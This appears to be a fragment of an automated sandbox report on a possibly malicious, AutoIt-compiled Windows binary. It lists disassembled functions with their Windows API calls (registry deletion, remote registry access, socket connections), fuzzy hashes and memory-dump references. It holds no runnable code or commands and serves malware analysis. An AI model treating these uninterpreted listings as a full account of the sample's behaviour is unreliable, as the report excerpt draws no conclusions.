                                                • String ID: \*.*
                                                • API String ID: 1377345388-1173974218
                                                • Opcode ID: e1577678ec4b6e029db3847f00ac88f0668eeb5a25880208bb1124d11bae637d
                                                • Instruction ID: b599bda064196c7a95f7496f66fb47b3640a3c745d8e7e34cd08f5c32ad64118
                                                • Opcode Fuzzy Hash: e1577678ec4b6e029db3847f00ac88f0668eeb5a25880208bb1124d11bae637d
                                                • Instruction Fuzzy Hash: 7841A5B1508384AEC751EF65C8499DF77E8AF89390F00087EF485C3151EA38D689D752
                                                APIs
                                                • _memset.LIBCMT ref: 010072AA
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01007351
                                                • IsMenu.USER32(?), ref: 01007369
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010073B1
                                                • DrawMenuBar.USER32 ref: 010073C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Menu$Item$DrawInfoInsert_memset
                                                • String ID: 0
                                                • API String ID: 3866635326-4108050209
                                                • Opcode ID: dab647ce5fc346298cd5c563d51351add85beef298ce662b701b46a7db12eebf
                                                • Instruction ID: f941b57ccf9e785616016365baa318c5491bc1896a2664d795aed507aa36923c
                                                • Opcode Fuzzy Hash: dab647ce5fc346298cd5c563d51351add85beef298ce662b701b46a7db12eebf
                                                • Instruction Fuzzy Hash: 25414975A00209EFFB22DF54D885E9ABBF8FB04310F148469FE85A7290D739A950DF50
                                                APIs
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 01000FD4
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01000FFE
                                                • FreeLibrary.KERNEL32(00000000), ref: 010010B5
                                                  • Part of subcall function 01000FA5: RegCloseKey.ADVAPI32(?), ref: 0100101B
                                                  • Part of subcall function 01000FA5: FreeLibrary.KERNEL32(?), ref: 0100106D
                                                  • Part of subcall function 01000FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01001090
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 01001058
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                • String ID:
                                                • API String ID: 395352322-0
                                                • Opcode ID: d2124ca57bbeabf63c873b4ad20022ea2c3e11ba0ad31ac93cc9d851c45faae9
                                                • Instruction ID: d28327d5b9ec02495b77410c38020ecd786251adc4acbcf1e5cf0d2efa7c21d7
                                                • Opcode Fuzzy Hash: d2124ca57bbeabf63c873b4ad20022ea2c3e11ba0ad31ac93cc9d851c45faae9
                                                • Instruction Fuzzy Hash: BB311271901109BFEB26DF94D885EFFB7BCEF09350F0001A9F581E2180D7759A459B61
                                                APIs
                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 010062EC
                                                • GetWindowLongW.USER32(01914B08,000000F0), ref: 0100631F
                                                • GetWindowLongW.USER32(01914B08,000000F0), ref: 01006354
                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 01006386
                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 010063B0
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 010063C1
                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 010063DB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: LongWindow$MessageSend
                                                • String ID:
                                                • API String ID: 2178440468-0
                                                • Opcode ID: 02378c949b5e359df882054589c86610f81f78b747b4b6f31971bb093ec41476
                                                • Instruction ID: 77258248b5fcd6348dffcc944a9a7ee25469da9493f0df1ccc4b244213155a33
                                                • Opcode Fuzzy Hash: 02378c949b5e359df882054589c86610f81f78b747b4b6f31971bb093ec41476
                                                • Instruction Fuzzy Hash: 76313834600251AFEB32CF28DC84F5537E2FB49714F1881A8F5809F2E6CB77A8509B90
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FDDB2E
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FDDB54
                                                • SysAllocString.OLEAUT32(00000000), ref: 00FDDB57
                                                • SysAllocString.OLEAUT32(?), ref: 00FDDB75
                                                • SysFreeString.OLEAUT32(?), ref: 00FDDB7E
                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00FDDBA3
                                                • SysAllocString.OLEAUT32(?), ref: 00FDDBB1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                • String ID:
                                                • API String ID: 3761583154-0
                                                • Opcode ID: d0de5af3b3a7d42edfa152fc3712b59d6309d20822bd427e752f6a32d30da405
                                                • Instruction ID: 9f8a36319bd8a86bd65b604d4de36124c701641a15edec5f5eeecbf965566876
                                                • Opcode Fuzzy Hash: d0de5af3b3a7d42edfa152fc3712b59d6309d20822bd427e752f6a32d30da405
                                                • Instruction Fuzzy Hash: B6219472601219AF9F20EFA8DC88CBB73ADEB49364B068126F954DB250DB749C41A760
                                                APIs
                                                  • Part of subcall function 00FF7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00FF7DB6
                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00FF61C6
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00FF61D5
                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00FF620E
                                                • connect.WSOCK32(00000000,?,00000010), ref: 00FF6217
                                                • WSAGetLastError.WSOCK32 ref: 00FF6221
                                                • closesocket.WSOCK32(00000000), ref: 00FF624A
                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00FF6263
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                • String ID:
                                                • API String ID: 910771015-0
                                                • Opcode ID: 14a80829265e09d19dfad40df6aba56df8731ca09af0305db350ab259b094381
                                                • Instruction ID: 40b115d6285f8b3f6bdcb9ca8dca2e5f5d31ba5e3343dca8ef1bbc9dae0ffd34
                                                • Opcode Fuzzy Hash: 14a80829265e09d19dfad40df6aba56df8731ca09af0305db350ab259b094381
                                                • Instruction Fuzzy Hash: 5331B131600218AFDF20AF24CC85BBE7BADEF45724F044059FE45E7291CB79AD04ABA1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                • API String ID: 1038674560-2734436370
                                                • Opcode ID: 8001dcedf17bd72ffc8390610b070e5c8bea28a5c5ab56f7295261433d2bc746
                                                • Instruction ID: bf30960ebcc1472d3ad5fd53878a1f2dc41360b87434c071ecc83f4be647ab91
                                                • Opcode Fuzzy Hash: 8001dcedf17bd72ffc8390610b070e5c8bea28a5c5ab56f7295261433d2bc746
                                                • Instruction Fuzzy Hash: B7216AB260411166D320A734AC03FE7739AEF59354F18443BF843CA291EB549D49F394
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FDDC09
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FDDC2F
                                                • SysAllocString.OLEAUT32(00000000), ref: 00FDDC32
                                                • SysAllocString.OLEAUT32 ref: 00FDDC53
                                                • SysFreeString.OLEAUT32 ref: 00FDDC5C
                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00FDDC76
                                                • SysAllocString.OLEAUT32(?), ref: 00FDDC84
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                • String ID:
                                                • API String ID: 3761583154-0
                                                • Opcode ID: dcd88a0403607e31349756a112aea852afd3c8691dc6a38e9b8bdba006b67cda
                                                • Instruction ID: f621484bd8cc68abd805212ab7a0854d3f12060d664a52ef8140f079d5d45115
                                                • Opcode Fuzzy Hash: dcd88a0403607e31349756a112aea852afd3c8691dc6a38e9b8bdba006b67cda
                                                • Instruction Fuzzy Hash: A621A176604205AF9B20EFA8DC88DAA77EDEB09360F148126F944CB254DAB5DC41E764
                                                APIs
                                                  • Part of subcall function 00F81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F81D73
                                                  • Part of subcall function 00F81D35: GetStockObject.GDI32(00000011), ref: 00F81D87
                                                  • Part of subcall function 00F81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F81D91
                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01007632
                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0100763F
                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0100764A
                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01007659
                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01007665
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend$CreateObjectStockWindow
                                                • String ID: Msctls_Progress32
                                                • API String ID: 1025951953-3636473452
                                                • Opcode ID: e97524772c18fc08fab37911994fe123bcd242292f88ea97f854ca193d53e0a6
                                                • Instruction ID: f929e27e27cca6cdb875d381539bd7fd71200ad5826edb6dde5a8795f8d9756c
                                                • Opcode Fuzzy Hash: e97524772c18fc08fab37911994fe123bcd242292f88ea97f854ca193d53e0a6
                                                • Instruction Fuzzy Hash: A21193B2110119BFEF159F65CC85EEB7F5DEF08798F014114BA85A6090CA76AC21DBA4
                                                APIs
                                                • __init_pointers.LIBCMT ref: 00FA9AE6
                                                  • Part of subcall function 00FA3187: EncodePointer.KERNEL32(00000000), ref: 00FA318A
                                                  • Part of subcall function 00FA3187: __initp_misc_winsig.LIBCMT ref: 00FA31A5
                                                  • Part of subcall function 00FA3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00FA9EA0
                                                  • Part of subcall function 00FA3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00FA9EB4
                                                  • Part of subcall function 00FA3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00FA9EC7
                                                  • Part of subcall function 00FA3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00FA9EDA
                                                  • Part of subcall function 00FA3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00FA9EED
                                                  • Part of subcall function 00FA3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00FA9F00
                                                  • Part of subcall function 00FA3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00FA9F13
                                                  • Part of subcall function 00FA3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00FA9F26
                                                  • Part of subcall function 00FA3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00FA9F39
                                                  • Part of subcall function 00FA3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00FA9F4C
                                                  • Part of subcall function 00FA3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00FA9F5F
                                                  • Part of subcall function 00FA3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00FA9F72
                                                  • Part of subcall function 00FA3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00FA9F85
                                                  • Part of subcall function 00FA3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00FA9F98
                                                  • Part of subcall function 00FA3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00FA9FAB
                                                  • Part of subcall function 00FA3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00FA9FBE
                                                • __mtinitlocks.LIBCMT ref: 00FA9AEB
                                                • __mtterm.LIBCMT ref: 00FA9AF4
                                                  • Part of subcall function 00FA9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00FA9AF9,00FA7CD0,0103A0B8,00000014), ref: 00FA9C56
                                                  • Part of subcall function 00FA9B5C: _free.LIBCMT ref: 00FA9C5D
                                                  • Part of subcall function 00FA9B5C: DeleteCriticalSection.KERNEL32(0103EC00,?,?,00FA9AF9,00FA7CD0,0103A0B8,00000014), ref: 00FA9C7F
                                                • __calloc_crt.LIBCMT ref: 00FA9B19
                                                • __initptd.LIBCMT ref: 00FA9B3B
                                                • GetCurrentThreadId.KERNEL32 ref: 00FA9B42
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                • String ID:
                                                • API String ID: 3567560977-0
                                                • Opcode ID: 25505ad545077f61342e89a3ff5028234ba07b4353422bd3d3994bcd6a6add6f
                                                • Instruction ID: 63367a6cdb5f74929d03bea407fc017cf68d9f20c4fd0074c6746332bbb04c05
                                                • Opcode Fuzzy Hash: 25505ad545077f61342e89a3ff5028234ba07b4353422bd3d3994bcd6a6add6f
                                                • Instruction Fuzzy Hash: 51F090B290D7111AE7347674BC0368A36989F43770F204A3AF4A1C51C6EFED954176B0
                                                APIs
                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FA3F85), ref: 00FA4085
                                                • GetProcAddress.KERNEL32(00000000), ref: 00FA408C
                                                • EncodePointer.KERNEL32(00000000), ref: 00FA4097
                                                • DecodePointer.KERNEL32(00FA3F85), ref: 00FA40B2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                • String ID: RoUninitialize$combase.dll
                                                • API String ID: 3489934621-2819208100
                                                • Opcode ID: 06279e3ad4c219c8455bbdc6c208b41d3b0e5c26d5e35f78790c6821645de472
                                                • Instruction ID: 09e81af1d802213f39387a2df97de9af71d73b0661adf779b8d492377e6b1238
                                                • Opcode Fuzzy Hash: 06279e3ad4c219c8455bbdc6c208b41d3b0e5c26d5e35f78790c6821645de472
                                                • Instruction Fuzzy Hash: 44E0B6B4985311EFEB31AF61EE4EB453AB4B705752F209018F982E9098CBBF5500EB15
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _memmove$__itow__swprintf
                                                • String ID:
                                                • API String ID: 3253778849-0
                                                • Opcode ID: 21c363d6d5c09a7a42dfc03ef52fd438f6cd54c5821b196d12bfcbf1ca2abfab
                                                • Instruction ID: 42c56f05e2a2dc96e116cf3ef599ca419abb04dc0c8f0765663c93a703d7f118
                                                • Opcode Fuzzy Hash: 21c363d6d5c09a7a42dfc03ef52fd438f6cd54c5821b196d12bfcbf1ca2abfab
                                                • Instruction Fuzzy Hash: 7361AB7190028A9BCF01FF61CC82EFE37A5AF15308F484529F855AB292DB79E905FB50
                                                APIs
                                                  • Part of subcall function 00F87DE1: _memmove.LIBCMT ref: 00F87E22
                                                  • Part of subcall function 01000E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FFFDAD,?,?), ref: 01000E31
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010002BD
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 010002FD
                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 01000320
                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 01000349
                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0100038C
                                                • RegCloseKey.ADVAPI32(00000000), ref: 01000399
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                • String ID:
                                                • API String ID: 4046560759-0
                                                • Opcode ID: d9ba3da7e66c606df76cb4fc980b016737f015271e4c0c827930997b123f9020
                                                • Instruction ID: c2b53b0ef85938f4d1b06fd08f3a60ca037c20c876222605ef55f6d99344adbb
                                                • Opcode Fuzzy Hash: d9ba3da7e66c606df76cb4fc980b016737f015271e4c0c827930997b123f9020
                                                • Instruction Fuzzy Hash: 61515871208201AFEB12EB64D885EAFBBE9FF85314F04491DF585872A1DB35E904DB52
                                                APIs
                                                • GetMenu.USER32(?), ref: 010057FB
                                                • GetMenuItemCount.USER32(00000000), ref: 01005832
                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0100585A
                                                • GetMenuItemID.USER32(?,?), ref: 010058C9
                                                • GetSubMenu.USER32(?,?), ref: 010058D7
                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 01005928
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Menu$Item$CountMessagePostString
                                                • String ID:
                                                • API String ID: 650687236-0
                                                • Opcode ID: 7fc1447a8cd959e8a56669f924491bf5c46190250265f764fe14699f52d858e9
